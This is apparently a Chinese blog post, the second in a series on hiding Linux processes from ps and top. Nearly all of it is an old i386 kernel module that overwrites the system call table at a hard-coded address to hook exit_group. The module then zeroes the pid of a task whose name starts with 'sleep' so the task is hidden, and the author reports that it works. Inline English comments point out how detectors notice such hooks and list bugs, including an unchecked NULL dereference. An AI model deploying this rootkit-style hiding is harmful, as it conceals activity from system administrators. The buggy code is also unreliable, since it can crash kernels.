linux下如何隐藏进程(ps/top)(二)


前一篇关于隐藏进程的博客中,提到了两个问题,

1)进程不能自己退出

2)进程不能有中断信号

用strace命令调查,发现进程正常退出时调用的是exit_group系统调用,对应的内核函数是sys_exit_group()

hook之:

=============================================================================================================================

#include <linux/kernel.h>

#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/list.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <linux/uaccess.h>
#include <asm-i386/cacheflush.h>
#include <asm/mman.h>

/* Module metadata; a GPL tag avoids the "tainted" warning but does not
 * change what the module does to the syscall table below. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("JASON.LIN.YU");

/* PID of the task that was zeroed out; written in start_module and read
 * back in new_sys_exit_group and clean_module. 0 means "nothing saved". */
static pid_t old_pid = 0;
/* Hard-coded kernel virtual address of sys_call_table for one specific
 * kernel build. A fixed table address plus the write-enable/overwrite
 * sequence below is exactly what syscall-table integrity checkers look for. */
static unsigned long **sys_call_table =(unsigned long **) 0xc06294e0;
/* Prefix compared against task->comm (see the memcmp in start_module);
 * any comm beginning with this string matches, not only "sleep" itself. */
static char * mystring = "sleep";
/* Original sys_exit_group entry, saved so the hook can chain to it and
 * clean_module can restore the table. */
static void (*old_sys_exit_group)(int);
/* Mark the page containing _addr read/write through change_page_attr(),
 * so the (normally read-only) syscall table can be written. The pgprot
 * value is built from VM_READ|VM_WRITE, which are vm_flags bits rather than
 * page-protection bits; whether that yields the intended PTE flags is
 * kernel-specific and not verified here. Returns change_page_attr()'s result. */
static int set_pg_rw(long unsigned int _addr)
{
        struct page* pg;
        pgprot_t prot;
        pg = virt_to_page(_addr);
        prot.pgprot = VM_READ|VM_WRITE;
        return change_page_attr(pg, 1, prot);
}

/* Counterpart of set_pg_rw(): put the page containing _addr back to
 * read-only after the table entry has been swapped. Same caveat about the
 * pgprot value being built from a vm_flags constant (VM_READ). */
static int set_pg_r(long unsigned int _addr)
{
        struct page* pg;
        pgprot_t prot;
        pg = virt_to_page(_addr);
        prot.pgprot = VM_READ;
        return change_page_attr(pg, 1, prot);
}

/* Replacement entry for sys_exit_group. If the exiting task has pid 0 it is
 * assumed to be the one start_module zeroed, and the saved pid is written
 * back before chaining to the original handler. The check is on pid == 0
 * only, so it does not confirm the task is actually the hidden one.
 * Hooked exit paths like this are observable: the table entry no longer
 * points into the kernel text, and the hook's address belongs to a module. */
asmlinkage void new_sys_exit_group(int errcode)
{
        if( 0 == current->pid){
                current->pid = old_pid;
        }
        old_sys_exit_group(errcode);
}

/* Module init. Two steps: (1) make the syscall table page writable, save the
 * exit_group entry and replace it with new_sys_exit_group, then re-protect
 * the page; (2) walk the task list starting from the loading process,
 * take the first task whose comm begins with mystring, remember its pid and
 * overwrite task->pid with 0. Always returns 0.
 *
 * Observations on what the code as written does:
 *  - memcmp over strlen(mystring) is a prefix match on comm.
 *  - If no task matches, old_pid stays 0 and find_task_by_pid(0) is used;
 *    the return value is dereferenced without a NULL check.
 *  - Rewriting task->pid leaves the task struct inconsistent with the pid
 *    hash and /proc, which is the kind of mismatch a task-list vs. /proc
 *    cross-check or a syscall-table integrity scan reports. */
int start_module(void)
{
        struct list_head* list = NULL;
        struct task_struct *task = NULL;

        /* Open the table for writing, swap the exit_group entry, close it. */
        set_pg_rw((long unsigned int )sys_call_table);
        old_sys_exit_group = sys_call_table[__NR_exit_group];
        sys_call_table[__NR_exit_group] = new_sys_exit_group
;
        set_pg_r((long unsigned int)sys_call_table);

        /* First task whose comm starts with mystring gets its pid zeroed. */
        list_for_each(list, &current->tasks){
                task = list_entry(list, struct task_struct, tasks);
                if(0 == memcmp(mystring, task->comm, strlen(mystring))){
                        old_pid = task->pid;
                        task->pid = 0;
                        break;
                }
        }

        /* Second lookup by the saved pid; result is not NULL-checked. */
        task = find_task_by_pid(old_pid);
        task->pid = 0;
        return 0;
}

/* Module exit. Walks the task list again, writes old_pid back into the first
 * task whose comm begins with mystring, then restores the original
 * exit_group entry in the syscall table (write-enable, restore, re-protect).
 * Because the match is by comm prefix and not by identity, if the hidden
 * task has already exited (new_sys_exit_group restored its pid on the way
 * out) a different task with a matching comm would receive old_pid here. */
void clean_module(void)
{
        struct list_head* list;
        struct task_struct *task = NULL;

        list_for_each(list, &current->tasks){
                task = list_entry(list, struct task_struct, tasks);
                if( 0 == memcmp(mystring, task->comm, strlen(mystring))){
                        task->pid = old_pid;
                        break;
                }
        }

        /* Put the saved handler back so exit_group is no longer hooked. */
        set_pg_rw((long unsigned int)sys_call_table);
        sys_call_table[__NR_exit_group] = old_sys_exit_group;
        set_pg_r((long unsigned int)sys_call_table);
        return;
}

/* Register the init/exit entry points; start_module runs on insmod,
 * clean_module on rmmod. */
module_init(start_module);

module_exit(clean_module);

=============================================================================================================================

好使

